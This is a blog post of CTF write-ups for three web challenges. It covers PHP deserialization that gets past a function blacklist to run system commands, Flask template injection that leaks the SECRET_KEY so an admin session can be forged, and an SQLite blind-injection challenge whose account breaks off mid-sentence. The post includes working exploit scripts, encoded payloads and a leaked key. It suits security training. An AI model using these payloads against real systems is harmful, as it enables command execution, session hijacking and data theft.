fbctf base.php,buuctf

BUU challenge log

Yesterday I took the juniors out for dinner; roar is still being worked on (still not solved), so I'll do two BUU challenges and pad the blog a little. It has been a long time since I wrote a post.

[WangDing Cup 2020, Zhuque Group] phpweb

The page shows 带带大师兄 (a meme picture), refreshes itself every so often and prints the latest time. Capturing the traffic shows a POST with two parameters, func and p, 【one of them weighs ninety-odd kilos (not really)】 which presumably end up in call_user_func. Trying to run system commands through it returns "hacker", so there is a filter. We can, however, read index.php with func=file_get_contents&p=index.php; its contents are:

```php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else{
        die("Hacker...");
    }
}
```

The challenge author blacklists a whole pile of dangerous functions and it looks like a dead end... In fact unserialize is not on the list, so we can go through deserialization: with func=unserialize&p=payload, the Test object we supply is reconstructed and its __destruct calls gettime($this->func, $this->p) with our own property values, a path that never passes through the blacklist check. The exp that generates the payload:

```php
<?php

$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");
function gettime($func, $p)
{
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

class Test
{
    var $p = "Y-m-d h:i:s a";
    var $func = "date";

    function __destruct()
    {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

/*$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}*/

// Note: Test::__destruct is defined here as well, so the command in $a->p also
// runs on the machine generating the payload when this script exits.
$a = new Test();
/*$a->p = 'ls';*/

/*$a->p = 'ls /';*/

$a->p = "find / -name 'flag*'";
$a->func = 'system';
print_r(urlencode(serialize($a)));

?>
```

Once find has located the flag file, the final request reads it (the serialized object's p is cat /tmp/flagoefiu4r93):

func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

flag{89e676b6-cf76-4184-9f0d-12f5b9682804}

gg

[FBCTF2019]Event

Some poking around reveals an SSTI in the POST parameters:

event_name=2333&event_address=123&event_important=__class__ (or __dict__) is reflected in the response, which confirms the SSTI.

event_name=2333&event_address=123&event_important=__class__.__init__.__globals__

The injection point is event_important, so we dump the configuration (the app is built on Flask):

event_name=2333&event_address=123&event_important=__class__.__init__.__globals__[app].config

This yields the important piece: 'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

With the secret key we can forge the session; setting the username to admin is enough. Flask's cookie layout is: the base64 of the zlib-compressed JSON as the payload, then a dot, the timestamp, a dot, and the HMAC signature.

The script:

```python
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()
```
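To make the cookie layout concrete, here is an added example (not the write-up's script and not Flask's own code): a standard-library model of payload.timestamp.hmac with constructed keys, deliberately simplified and not byte-compatible with Flask's itsdangerous encoding. It shows that a cookie minted with the leaked key verifies cleanly, and that rotating SECRET_KEY is what makes the server reject it.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Constructed keys: same shape as the leaked SECRET_KEY, not the challenge's value.
LEAKED_KEY = b"example-leaked-secret-key-not-the-real-one"
ROTATED_KEY = b"example-rotated-secret-key"


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_session(data: dict, key: bytes, ts: int) -> str:
    """Build payload.timestamp.signature: the payload is base64(zlib(json)) and
    the HMAC covers payload and timestamp together (simplified, not itsdangerous)."""
    payload = _b64(zlib.compress(json.dumps(data, sort_keys=True).encode()))
    stamp = _b64(ts.to_bytes(8, "big"))
    mac = hmac.new(key, f"{payload}.{stamp}".encode(), hashlib.sha256).digest()
    return f"{payload}.{stamp}.{_b64(mac)}"


def verify_session(cookie: str, key: bytes, now: int, max_age: int = 3600):
    """Return the session dict if signature and age check out, else None.
    Anyone holding `key` can mint a cookie that passes; the key is the whole secret."""
    try:
        payload, stamp, sig = cookie.split(".")
        expect = hmac.new(key, f"{payload}.{stamp}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expect, _unb64(sig)):
            return None
        if now - int.from_bytes(_unb64(stamp), "big") > max_age:
            return None
        return json.loads(zlib.decompress(_unb64(payload)))
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    forged = sign_session({"user": "admin"}, LEAKED_KEY, ts=1000)
    print(verify_session(forged, LEAKED_KEY, now=1500))   # {'user': 'admin'}: accepted
    print(verify_session(forged, ROTATED_KEY, now=1500))  # None: rotated key rejects it
```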

flag{63a5dfbd-241a-4a52-bbbe-7fc46c058dae}

[HarekazeCTF2019]Sqlite Voting

The author of this challenge is a bit scary....

The page asks you to pick your favourite animal.


There are two links underneath; the first shows the source:

```php
<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
    // whitespace chars
    '\s',
    // dangerous functions
    'blob', 'load_extension', 'char', 'unicode',
    '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp',
    'in', 'limit', 'order', 'union', 'join'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

header("Content-Type: text/json; charset=utf-8");

// check user input
if (!isset($_POST['id']) || empty($_POST['id'])) {
  die(json_encode(['error' => 'You must specify vote id']));
}
$id = $_POST['id'];
if (!is_valid($id)) {
  die(json_encode(['error' => 'Vote id contains dangerous chars']));
}

// update database
$pdo = new PDO('sqlite:../db/vote.db');
$res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");
if ($res === false) {
  die(json_encode(['error' => 'An error occurred while updating database']));
}

// succeeded!
echo json_encode([
  'message' => 'Thank you for your vote! The result will be published after the CTF finished.'
]);
```

The other link provides the SQL:

```sql
DROP TABLE IF EXISTS `vote`;
CREATE TABLE `vote` (
  `id` INTEGER PRIMARY KEY AUTOINCREMENT,
  `name` TEXT NOT NULL,
  `count` INTEGER
);
INSERT INTO `vote` (`name`, `count`) VALUES
  ('dog', 0),
  ('cat', 0),
  ('zebra', 0),
  ('koala', 0);

DROP TABLE IF EXISTS `flag`;
CREATE TABLE `flag` (
  `flag` TEXT NOT NULL
);
INSERT INTO `flag` VALUES ('HarekazeCTF{}');
```

On the vote.php page we control the id parameter, and the challenge tells us the backend database is SQLite, so we can try SQL injection. SQLite injection is not much different from the usual kind; we just need to reach the hidden flag table.

But the code shown on vote.php has a blacklist: it filters the characters " % ' * + / < = > _ ` ~ - (you have to admire the foreign author for listing them right in the comments), whitespace, and the dangerous words 'blob', 'load_extension', 'char', 'unicode', '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp', 'in', 'limit', 'order', 'union', 'join'.

Judging by the responses a boolean-based blind injection should be possible, but with ', " and char filtered we cannot compare characters directly or go through ascii
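As an added example (not the challenge's code), the vote schema rebuilt in an in-memory SQLite database with Python's sqlite3, comparing the interpolated UPDATE from vote.php with a parameter-bound version. The input "1 OR 1" is constructed for the comparison and is not something the blacklist above would let through; the point is that binding, not the blacklist, is what makes the id inert.

```python
import re
import sqlite3

# The challenge's schema, reproduced from the SQL shown above (flag value is the placeholder).
SCHEMA = """
CREATE TABLE vote (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT NOT NULL, count INTEGER);
INSERT INTO vote (name, count) VALUES ('dog', 0), ('cat', 0), ('zebra', 0), ('koala', 0);
CREATE TABLE flag (flag TEXT NOT NULL);
INSERT INTO flag VALUES ('HarekazeCTF{}');
"""


def fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vote_interpolated(db: sqlite3.Connection, vote_id: str) -> int:
    """The vote.php pattern: id is pasted into the SQL text. Returns rows changed."""
    cur = db.execute(f"UPDATE vote SET count = count + 1 WHERE id = {vote_id}")
    return cur.rowcount


def vote_bound(db: sqlite3.Connection, vote_id: str) -> int:
    """Hardened form: id must be a whole number and is passed as a bound
    parameter, so its text can never become part of the statement."""
    if not re.fullmatch(r"[0-9]+", vote_id):
        return 0
    cur = db.execute("UPDATE vote SET count = count + 1 WHERE id = ?", (int(vote_id),))
    return cur.rowcount


def counts(db: sqlite3.Connection) -> dict:
    return dict(db.execute("SELECT name, count FROM vote ORDER BY id"))


if __name__ == "__main__":
    db = fresh_db()
    print(vote_interpolated(db, "1 OR 1"), counts(db))  # 4 rows changed: every animal got a vote
    db = fresh_db()
    print(vote_bound(db, "1 OR 1"), counts(db))         # 0 rows changed
```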

Content collected from the web; if anything infringes, message me and it will be removed.
